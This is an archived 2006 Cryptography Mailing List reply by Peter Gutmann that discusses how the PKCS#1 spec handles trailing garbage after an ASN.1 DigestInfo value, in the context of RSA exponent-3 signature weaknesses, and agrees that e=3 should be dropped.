Exponent 3 damage spreads...
Peter Gutmann
pgut001 at cs.auckland.ac.nz
Thu Sep 21 12:28:14 EDT 2006
"Kuehn, Ulrich" <Ulrich.Kuehn at telekom.de> writes:
> 10.2.3 Data decoding
>
> The data D shall be BER-decoded to give an ASN.1 value of
> type DigestInfo, which shall be separated into a message
> digest MD and a message-digest algorithm identifier. The
> message-digest algorithm identifier shall determine the
> "selected" message-digest algorithm for the next step.
>
>Here, any trailing garbage would be included in data D. But does an ASN.1
>value allow such a thing? I am asking this independently of our discussion
>here.
I don't think it's a problem, you just take the ASN.1 DigestInfo value, since
the trailing garbage isn't part of the DigestInfo, you ignore it.
Specifically, the ASN.1 object is entirely self-contained, so you can tell
exactly where it ends and what it contains. Anything outside it is beyond the
scope of this specification :-).
(When the spec was written, I think the thought that someone would append
trailing garbage never cropped up, so it's never explicitly addressed).
>Anyway, I think we agree on the point that the spec (even version 2.1) is in
>some point unprecise which should be considered a bug, as it can lead to
>implementation flaws. And yes, given what we know, e=3 is a good candidate
>for elimination :)
Yup :-).
Peter.
---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majordomo at metzdowd.com
More information about the cryptography
mailing list